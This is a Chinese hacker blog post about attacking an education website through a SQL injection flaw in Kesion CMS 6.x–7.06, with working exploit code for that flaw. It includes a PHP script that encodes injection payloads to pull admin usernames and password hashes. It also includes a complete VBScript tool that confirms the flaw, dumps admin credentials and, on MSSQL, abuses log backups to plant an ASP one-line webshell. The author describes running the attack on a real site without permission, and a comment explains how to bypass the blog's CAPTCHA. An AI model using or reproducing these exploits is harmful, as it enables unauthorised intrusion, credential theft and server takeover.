By:ywisax

    今天跟某黑阔搞一edu,很悲催的站长,前段时间才装的科讯6.5,现在直接被爆菊花。。。

    t00ls的大牛只提供了利用方法,我爆了md5,可是解不出•••mssql版的科讯,运气好的能备份shell呢,不能放弃鸟。于是,就着网上的一篇分析文,写了段php,本地搭建php+apache后,直接丢工具就可以跑了。

以下是引用片段:

<?php
/*
$str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
for ($i=0; $i<=strlen($str); $i++){
        $temp .= "%25".base_convert(ord($str[$i]),10,16);
}
echo $temp."0";
*/
// http://www.edu.cn/user/reg/regajax.asp?action=getcityoption&province=%2566%2527%2520%256F%2572%2520%2531%253D%2531%2500
// 所有信息
$id = $_GET['id'];
$url = "http://www.edu.cn/user/reg/regajax.asp?action=getcityoption&province=";
$param = "f' or 1=1 and 1=".$id; // ?id=1
for ($i = 0; $i < strlen($param); $i ++)
{
        $temp .= "%25".base_convert(ord($param[$i]),10,16);
}
$url = $url.$temp."%2500";
//echo $url;
//echo file_get_contents($url);

echo GetSources($url);

function GetSources($Url,$User_Agent='',$Referer_Url='') //抓取某个指定的页面
{
//$Url 需要抓取的页面地址
//$User_Agent 需要返回的user_agent信息 如“baiduspider”或“googlebot”
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $Url);
curl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt ($ch, CURLOPT_REFERER, $Referer_Url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$MySources = curl_exec ($ch);
curl_close($ch);
return $MySources;
}
?>

科讯 kesion 6.x - 7.06 继续利用(丢工具跑吧) - 脚本漏洞

    自己看着修改就是了。

    这里还有一个问题,php 的file_get_contents不能获取505错误的具体信息,所以不能报错注射,只能盲注,希望大牛能指点一下•••

    解决了•••

 

2011-8-6 15:35:04 补充:

    【匿名者】补充了一个工具,提供个工具吧,在mssql显错模式下可以直接获得webshell: http://hi.baidu.com/netjacker/blog/item/05f9802c459ee92e359bf715.html

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具:

'*=========================================================================
'* Intro   科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具
'* Usage   在命令提示符下输入:Cscript.exe Exp.vbs www.target.com
'* Author  雨中风铃
'* WEB     http://hi.baidu.com/yanfei6
'*=========================================================================

Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send()
        PostData = .ResponseText
    End With
    Set Http = Nothing
    Wscript.Sleep 2000
End Function

Function BackDB(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send()
        WScript.Echo "[ " & .Status & " " & .statusText & " ] " & Unescape(Unescape(PostUrl))
        If .Status<>200 Then
            WScript.Echo "日志差异备份出错!"
            WScript.Quit
        End If
    End With
    Set Http = Nothing
    Wscript.Sleep 2000
End Function

Function IsSuccess(PostUrl, strSign)
    strData = PostData(PostUrl)
    'Wscript.Echo strData
    if InStr(strData, strSign) >0 then
        IsSuccess = True
    Else
        IsSuccess = False
    End If
End Function

Function Encode(strData)
    Dim strTemp, I
    For I = 1 To Len(strData)
        strTemp = strTemp & "%25" & Hex(Asc(Mid(strData, I, 1)))
    Next
    Encode = strTemp & "%2500"
End Function

Function getData(strData, patrn)
    dim strTemp
    Set re = New RegExp
    re.Pattern = patrn
    re.IgnoreCase = True
    re.Global = True
    Set Matches = re.Execute(strData)
    For i = 0 To Matches.Count - 1
        If Matches(i).Value<>"" Then
            strTemp = strTemp & vbCrLf & Matches(i).SubMatches(0)
        End If
    Next
    getData = strTemp
End Function

If WScript.Arguments.Count <> 1 Then
    WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的网址"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.kesion.com/"
    WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If

strHoleUrl = attackUrl & "user/reg/regajax.asp?action=getcityoption&province="
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole' From KS_Admin")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "恭喜!存在漏洞"
Else
    WScript.Echo "没有检测到漏洞"
    WScript.Quit
End If

strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole'")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "数据库为:MSSQL"
    bAccess = False
Else
    WScript.Echo "数据库为:ACCESS"
    bAccess = True
End If

strTestUrl = strHoleUrl & Encode("' union Select top 10 AdminID,UserName+'<->'+PassWord From KS_Admin")
WScript.Echo "用户名<->密码:" & getData(PostData(strTestUrl), "value=""([^""]+)")

strTestUrl = strHoleUrl & "%25i"
strWebPath = getData(PostData(strTestUrl), ">([^>]+)\.\./\.\./KS_Cls/Kesion\.EscapeCls\.asp")
strWebPath = Replace(strWebPath, vbCrLf, "")
If strWebPath <> "" Then
    WScript.Echo "网站绝对路径:" & strWebPath
End If

If Not bAccess Then
    strTestUrl = strHoleUrl & Encode("' union Select 1, db_name()")
    strDatabase = getData(PostData(strTestUrl), "value=""([^""]+)")
    strDatabase = Replace(strDatabase, vbCrLf, "")
    WScript.Echo "MSSQL数据库名为:" & strDatabase
End If

WScript.Echo "正在进行数据库差异备份:"
If strWebPath <> "" And strDatabase <> "" Then
    BackDB(strHoleUrl & Encode("';alter database " & strDatabase & " set RECOVERY FULL"))
    BackDB(strHoleUrl & Encode("';create table cmd (a image)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = 'c:\cmd' with init"))
    BackDB(strHoleUrl & Encode("';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = '" & strWebPath & "2.asp'"))
    BackDB(strHoleUrl & Encode("';drop table cmd"))
    BackDB(strHoleUrl & Encode("';alter database "& strDatabase & " set RECOVERY SIMPLE"))
End If
WScript.Echo "Execute一句话木马地址为:" & attackUrl & "user/reg/2.asp"
WScript.Echo "密码为:a"

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具

留言评论(旧系统):

【匿名者】 @ 2011-08-06 15:30:48

提供个工具吧,在mssql显错模式下可以直接获得webshell: http://hi.baidu.com/netjacker/blog/item/05f9802c459ee92e359bf715.html 另外说一下,本站验证码形同虚设,利用正则匹配很容易在找答案页中获得正确答案

本站回复:

验证码主要是防止一些自动发留言的软件,由于答案有点变态,所以弄了答案页。至于什么形同虚设,完全可以去掉答案页,但是给你去掉答案页,我看你那里找答案去,验证码这个东西嘛,有点意思就可以了,弄过的太变态了,怎么回复。